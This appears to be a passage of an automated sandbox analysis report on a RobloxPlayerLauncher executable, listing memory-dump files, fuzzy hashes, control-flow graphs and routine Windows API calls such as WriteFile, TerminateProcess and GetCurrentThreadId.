              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
              • String ID:
              • API String ID: 1991824761-0
              • Opcode ID: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
              • Instruction ID: 5409e56de043acacab75a453b86ffadee238170dee6c38dd643b79a99aaccb91
              • Opcode Fuzzy Hash: 40586de7f601c6746e19bf40a34f0e4dfae9b5a182251cbe3caa1a9dd75485d5
              • Instruction Fuzzy Hash: FEF08274804A496BDB319BB9DD0CA5B3B9A6F01360F5C4A10F829C60F1EB32ED52CF90

              Control-flow Graph

              APIs
              • GetCurrentProcess.KERNEL32(00000002,?,00A140B5,00A05409,00A05409,?,00000002,2912923C,00A05409,00000002), ref: 00A140CC
              • TerminateProcess.KERNEL32(00000000,?,00A140B5,00A05409,00A05409,?,00000002,2912923C,00A05409,00000002), ref: 00A140D3
              • ExitProcess.KERNEL32 ref: 00A140E5
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction ID: 3a98890832b10b93a759d7b33ccc4f7f60f1ae0e39bd3c1366169b26979eba62
              • Opcode Fuzzy Hash: 759ee7fabe2af72b44d82f586e88cc17b1f3853521c7aad4393c23a74f47673d
              • Instruction Fuzzy Hash: 3DD05E3D004144BBCF11AFA5DD0D8DC3F2AEF893517104010F90546032CB7688D28A80

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 481 a09474-a09493 482 a09499-a0949b 481->482 483 a0966d 481->483 484 a094c7-a094ed 482->484 485 a0949d-a094bc call 9fb712 482->485 486 a0966f-a09673 483->486 488 a094f3-a094f9 484->488 489 a094ef-a094f1 484->489 492 a094bf-a094c2 485->492 488->485 491 a094fb-a09505 488->491 489->488 489->491 493 a09515-a09520 call a08fc1 491->493 494 a09507-a09512 call a098bb 491->494 492->486 499 a09562-a09574 493->499 500 a09522-a09527 493->500 494->493 501 a095c5-a095e5 WriteFile 499->501 502 a09576-a0957c 499->502 503 a09529-a0952d 500->503 504 a0954c-a09560 call a08b87 500->504 507 a095f0 501->507 508 a095e7-a095ed GetLastError 501->508 510 a095b3-a095be call a0903f 502->510 511 a0957e-a09581 502->511 505 a09533-a09542 call a08f59 503->505 506 a09635-a09647 503->506 522 a09545-a09547 504->522 505->522 512 a09651-a09663 506->512 513 a09649-a0964f 506->513 517 a095f3-a095fe 507->517 508->507 521 a095c3 510->521 518 a095a1-a095b1 call a09203 511->518 519 a09583-a09586 511->519 512->492 513->483 513->512 523 a09600-a09605 517->523 524 a09668-a0966b 517->524 528 a0959c-a0959f 518->528 519->506 525 a0958c-a09597 call a0911a 519->525 521->528 522->517 529 a09633 523->529 530 a09607-a0960c 523->530 524->486 525->528 528->522 529->506 532 a09625-a0962e call a04213 530->532 533 a0960e-a09620 530->533 532->492 533->492
              APIs
                • Part of subcall function 00A08B87: GetConsoleOutputCP.KERNEL32(2912923C,00000000,00000000,00000000), ref: 00A08BEA
              • WriteFile.KERNEL32(?,00000000,?,00B47378,00000000,0000000C,00000000,00000000,00A28271,00000000,00B47378,00000010,009FCB49,00000000,00000000,00000000), ref: 00A095DD
              • GetLastError.KERNEL32 ref: 00A095E7
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConsoleErrorFileLastOutputWrite
              • String ID:
              • API String ID: 2915228174-0
              • Opcode ID: 852ef951b28a0e9f4df014152bf0c9f26d16e132a5bcba24b3632a4dbfee0b16
              • Instruction ID: 315851a188fb439a988d83a8ca869717e775b24c83754f05621aa51a8b16c36e
              • Opcode Fuzzy Hash: 852ef951b28a0e9f4df014152bf0c9f26d16e132a5bcba24b3632a4dbfee0b16
              • Instruction Fuzzy Hash: 9C618D71D0414DAEDF119FA8EC84AEFBBB9AF09308F144185E914A7293D776DA06CB60

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 536 8bc620-8bc646 537 8bc64c-8bc65a 536->537 538 8bc7e2-8bc7ea 536->538 539 8bc74a-8bc74d 537->539 540 8bc660-8bc667 537->540 541 8bc750-8bc7d9 GetCurrentThreadId call 72ed70 call a03e90 539->541 542 8bc67b-8bc70f call 9f7a50 GetCurrentThreadId call 8bd060 call 8bfb60 call 72ed70 call a03e90 540->542 543 8bc669-8bc670 540->543 541->538 561 8bc721-8bc728 542->561 562 8bc711-8bc719 542->562 543->542 544 8bc672-8bc676 543->544 544->541 561->538 563 8bc72e-8bc749 561->563 564 8bc71e 562->564 564->561
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 008BC6A0
              • GetCurrentThreadId.KERNEL32 ref: 008BC760
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CurrentThread
              • String ID:
              • API String ID: 2882836952-0
              • Opcode ID: 990d0d4e793a06191e068efef799819d2ed8acaa28945d51aadf1ea4f32aca8b
              • Instruction ID: 6e066eb32941de50e7204848c2b01267c961dd46c89f4bbe4834937b84b9724b
              • Opcode Fuzzy Hash: 990d0d4e793a06191e068efef799819d2ed8acaa28945d51aadf1ea4f32aca8b
              • Instruction Fuzzy Hash: D7512F71D002089FDB14DF98DC45BFEBB78FF41300F044269E955A7282DB719A65CBA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 566 8bc490-8bc49e 567 8bc4a0-8bc4a2 566->567 568 8bc507-8bc50a 566->568 569 8bc4ba-8bc504 GetCurrentThreadId call 8bd000 567->569 570 8bc4a4-8bc4ab 567->570 569->568 571 8bc50b-8bc578 call 9f7a50 GetCurrentThreadId call 8bd110 570->571 572 8bc4ad-8bc4b4 570->572 582 8bc57a-8bc584 571->582 583 8bc58c-8bc593 571->583 572->571 573 8bc4b6 572->573 573->569 585 8bc589 582->585 583->568 584 8bc599-8bc5b1 583->584 585->583
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 008BC4C9
              • GetCurrentThreadId.KERNEL32 ref: 008BC535
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CurrentThread
              • String ID:
              • API String ID: 2882836952-0
              • Opcode ID: 9132f180657be7adc1a0685819922208d4ab2e96d44190ef006a539abe77fd34
              • Instruction ID: 0d51ec40682031c5a812f53fd3f844760971207370d3d07ca988f1303d3ff99b
              • Opcode Fuzzy Hash: 9132f180657be7adc1a0685819922208d4ab2e96d44190ef006a539abe77fd34
              • Instruction Fuzzy Hash: BB315775800209EBCF10EF94EC45AEE7BB5FF08304F044259FE58A6250DB369AA1DB95

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 587 a0903f-a09094 call 9e0920 590 a09096 587->590 591 a09109-a09119 call 9e15fd 587->591 593 a0909c 590->593 594 a090a2-a090a4 593->594 596 a090a6-a090ab 594->596 597 a090be-a090e3 WriteFile 594->597 598 a090b4-a090bc 596->598 599 a090ad-a090b3 596->599 600 a09101-a09107 GetLastError 597->600 601 a090e5-a090f0 597->601 598->594 598->597 599->598 600->591 601->591 602 a090f2-a090fd 601->602 602->593 603 a090ff 602->603 603->591
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,?,00A095C3,00000000,00000000,00000000,?,0000000C,00000000), ref: 00A090DB
              • GetLastError.KERNEL32(?,00A095C3,00000000,00000000,00000000,?,0000000C,00000000,00000000,00A28271,00000000,00B47378,00000010,009FCB49,00000000,00000000), ref: 00A09101
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID:
              • API String ID: 442123175-0
              • Opcode ID: 5ca0e78219dbf8af4536d3adc08f8d31cdb846dec39ae9accb756b1ab49c8259
              • Instruction ID: d52a7d19358c9bafd939415af1227ce337feba9e2007a605cb9c65ff31049164
              • Opcode Fuzzy Hash: 5ca0e78219dbf8af4536d3adc08f8d31cdb846dec39ae9accb756b1ab49c8259
              • Instruction Fuzzy Hash: 5B217435A002199FCF15CF6AEC809DEB7B9EB8D301F1441AAE946D7252D731DD46CB60

              Control-flow Graph

              APIs
              • GetLastError.KERNEL32(00B47218,0000000C), ref: 00A05517
              • ExitThread.KERNEL32 ref: 00A0551E
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorExitLastThread
              • String ID:
              • API String ID: 1611280651-0
              • Opcode ID: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction ID: 85ceacdb8c59b5428d7dbc31fef467feeb4cae1b9a0712499fe23f1e425572a8
              • Opcode Fuzzy Hash: 2e9028d6def5c3a72765abca56f2857f784939e4e5d96cf684b97680c196c81c
              • Instruction Fuzzy Hash: 02F0C274A84604AFDF05EBB0D94AAAF3B75FF85710F100549F0059B2A2CB756D41CF91
              APIs
              • RtlFreeHeap.NTDLL(00000000,00000000,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199F2
              • GetLastError.KERNEL32(?,?,00A211F5,?,00000000,?,?,00A21496,?,00000007,?,?,00A21A4A,?,?), ref: 00A199FD
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFreeHeapLast
              • String ID:
              • API String ID: 485612231-0
              • Opcode ID: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction ID: fb8b4a324697dc0f9d3f5675f5621251165e471ab24f7bd65eeea48243c7b30c
              • Opcode Fuzzy Hash: 31e5b3fbc133c8ee10c7ef70eccd77e3b5d3396747ecfa05bdeb9b2ae56a56b7
              • Instruction Fuzzy Hash: F6E08C76100258ABDB116FE8BC08BCA3B98EF88795F144120F608960A1CB318892CBD4
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
              • Instruction ID: ba1b07104893c29c7f65643d25fedcbf0dfff4304bf3c8891f3570b772c6b26a
              • Opcode Fuzzy Hash: 2ea5b227ad1b2843ae7900a68bd59de03641203ddfec6d0624273a3bece22013
